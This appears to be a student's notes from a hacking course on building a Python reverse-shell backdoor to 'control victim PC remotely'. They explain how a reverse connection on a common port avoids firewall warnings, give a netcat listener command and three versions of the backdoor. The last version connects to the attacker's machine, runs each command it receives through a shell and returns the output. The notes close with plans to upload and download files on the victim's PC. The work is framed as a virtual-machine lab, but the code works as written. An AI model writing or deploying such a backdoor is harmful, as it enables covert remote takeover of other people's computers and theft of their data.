#WHAT U WILL LEARN
- Creating backdoor and downloading files in victim PCs/control victim PC remotely
#DIRECT CONNECTION Vs REVERSE CONNECTION
#IN-Short Explanation:
Here we are using the reverse connection from VICTIM to HACKER
the reason while establishing firewall can warn the victim
we need to open a port to establish a connection
so if its
- H→V = the port should be open on the victim side
- V→H = the port should be open on the Hacker side
SO, if its H→V then the firewall can warn the victim that the port is open|insecure port...
Hence we use V→H [Which is reverse connection]
Note: If u did not understand the IN-Short Explanation GO for In-Depth Explanation
#In-Depth Explanation:
Now, a bind or a direct connection means the initial connection is going to go from the hacker to the victim machine, so the victim computer needs to be listening or waiting for incoming connections on
a specific port and then the hacker is going to connect on that port.
Now, this is not great because for the victim machine to be able to receive the connection, the back door will have to open a specific port in this machine.
And when you open a port on a machine that has a firewall, most of the time the firewall will give a warning, saying here there is an unknown port that has been opened on your computer by an unknown program. Be careful.
So most people or most systems will detect this.
So it's not a very good way of exploiting a system.
A better way of doing this is to use a reverse connection in this case, when the back door is executed
on the victim's computer, it will connect back to the hacker.
So what happens is the hacker will open a port on their computer and they're going to listen for incoming
connections.
Now, the hacker firewall might say here, be careful, there is an open port on your computer.
But me as a hacker, I'm not going to worry about this because I'm going to open this port myself.
So I know that this port is going to be used for something that is useful to me so I can even disable
my firewall before I do this.
Then we're going to execute the backdoor on the victim computer and the backdoor is going to connect
back from the victim computer to the hacker.
This connection is very similar to any other connection that the victim does every day, similar to
when a person opens a website, they connect to the website when they open a website.
Therefore, most firewalls will not trigger this as something that is suspicious, especially if the
port that's used that's opened on the hacker computer is a port that's commonly known such as Port 80 or Port 88, which is a port that's usually used by Web servers.
Therefore, as far as the firewall is concerned on here, this computer is making a connection to a
port that's usually used by Web servers and therefore this is not suspicious at all.
There are no open ports on this computer and there are no suspicious processes opening ports on the
machine.
Things too NOTE
I am running STUFFS in Windows-Virtual-Machine AND Kali-Machine
while setting up the same network
#REASON = Cuz, To establish the connection in a real machine you need a WIRELESS ADAPTER which is not friendly for everyone
Hence we use VIRTUAL MACHINE
- SEE this page to install a VIRTUAL BOX/MACHINE on ur PC
Now to open a port/start listening we use this command
- nc -vv -l -p 4444
- nc = netcat program used to port/start listening
- -vv = to view
- -l = to listen
- -p = the port that I want to listen to
- 4444 = the port that I want to listen on
We will soon make our own listener which will work better than netcat
As you can see in image, listening started while running the command
listening started which is basically mean the port is open
#CODE: #1_Backdoor
#ESTABLASHING CONNECTION
- #!/usr/bin/env python
- import socket
- connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connection.connect(("10.0.2.15", 4444))
- connection.close()
#Documentation
- #EXPLANATION:
- imported socket library implementing the code through the library
- So in order to connect to a destination, we have to, first of all, specify the IP of this destination. And in my case, I'm going to put the IP of the Kali machine, which is 10.0.2.15
- You can get the IP by running ifconfig in terminal, as you know.
- connection.closed used to close the connection
- And the next argument that we're going to pass is the port that is open on the target computer so that
- we can connect to it. And in our case, we listened on port 4444.
#SENDING and RECEIVING TEXT
- #!/usr/bin/env python
- import socket
- connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connection.connect(("10.0.2.15", 4444))
- connection.send("[+] Connection established.\n".encode())
- recived_data = connection.recv(1024)
- print (recived_data)
- connection.close()
 |
| #2_modefied_backdoor |
#EXPLANATION:
Before we just established a connection
we see send 0,recv 0 and the connection was established just for a movement
#line-7 = connection.send("[+] Connection established.\n".encode())
we send this string from WINDOW → KALI
#line-8 = recived_data = connection.recv(1024)
connection.recv Is used to recive DATA
1024 = Basically, this is the size of each batch of data.
So we'll be able to receive a maximum of one thousand and 24 bytes at a time. And we are storing this data in recived_data
#line-9 = print(recived_data)
and we just print received DATA
I typed 'I AM WRITING THIS ON KALI'on kali-terminal
We received this string from KALI → WINDOW
hence we see in OUTPUT
send 28,recv 28 = CUz we send and received the DATA this time
Now we're able to send data between the two computers connected using the socket that we created previously.
And like I said, as you can see right now, all we're sending is normal text.
We're not really sending any codes.
We're not really hacking anything.
You can see that what we have is something similar to a chart.
So you can actually implement a chart or a messenger app using sockets, just like what we're seeing right now.
So this goes to prove what I said is you can use sockets in so many scenarios and I'm just using it
to create a back door because this is a hacking course, which you can use it whenever you need to transfer
data or establish a connection between two computers.
#CODE: #3_Modefied_Backdoor
#EXECUTE SYSTEM COMMAND ON TRAGET COMPUTER
- #!/usr/bin/env python
- #SENDING COMMANDS
- import socket
- import subprocess
- def execute_system_command(command):
- return subprocess.check_output(command, shell=True)
- connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connection.connect(("10.0.2.15", 4444))
- connection.send("[+] Connection established.\n".encode())
- while True:
- command = connection.recv(1024)
- command_result = execute_system_command(command)
- connection.send(command_result)
- connection.close()
IN HERE WE PUT ipconfig WHICH IS SYSTEM COMMAND OF THE WINDOW
AND WE RECIVE RESULT IN OUR KALI LINUX
#EXPLANATION
import subprocess
Then I'm going to implement a function and I'm going to call this function execute_system-command.
And this function is going to take a command as a string, and what's going to do is it's going to do subprocess.check output and it's going to execute my command. And since this command is going to be a string, not a list, we're going to have to set Shell to True.
line-10 =
- connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
We created a socket object.
line-11 =
- connection.connect(("10.0.2.15", 4444))
Then we're going to connect to our target.
line-12 =
- connection.send("[+] Connection established.\n".encode())
Then we're going to send a message saying connection established.
This will be printed on the terminal, on the Kali machine.
Then we're going to wait for the person on the Kali machine to send us data.
line-15 =
- command = connection.recv(1024)
This data is going to be stored in a variable called command.
line-16 =
- command_result = execute_system_command(command)
Then this variable is going to be passed to a function called execute_system_command.
This function is going to use the variable that is going to get the command variable
line-7/8 =
- def execute_system_command(command):
- return subprocess.check_output(command, shell=True)
And it's going to pass it to subprocess.check_output, which will execute this command, and then it's going to
return the result after execution.
Now, my function is also going to return this result to the line where it was called from, and that's
going to be captured in my command result.
command_result = execute_system_command(command)
line-17=
- connection.send(command_result)
And finally, once we actually receive this result, we're going to send it.
So we're going to add another line.
We're going to see a connection that sends and we're going to send my command result.
As we can see in #2_modefied_backdoor the output We see is one command and one result, to run as many commands we want
we used while loop and set it to True so that it could run infinitely
 |
| Execution of the command 'ipconfig' |
- nc -vv -l -p 4444
the tool is working perfectly and it's allowing us to send the commands and receive the output properly.
but we are going to make our own listener
Now, there are more advantages of creating your own listener
if you go ahead and test the back door that we created so far, you'll see that the CD command doesn't work properly.
It doesn't allow you to go to a different directory.
So I also want to implement upload and download commands so that we can upload files to the target
computer and download files from there.
And that'll be much easier and it will make more sense if we do it using our own listener.
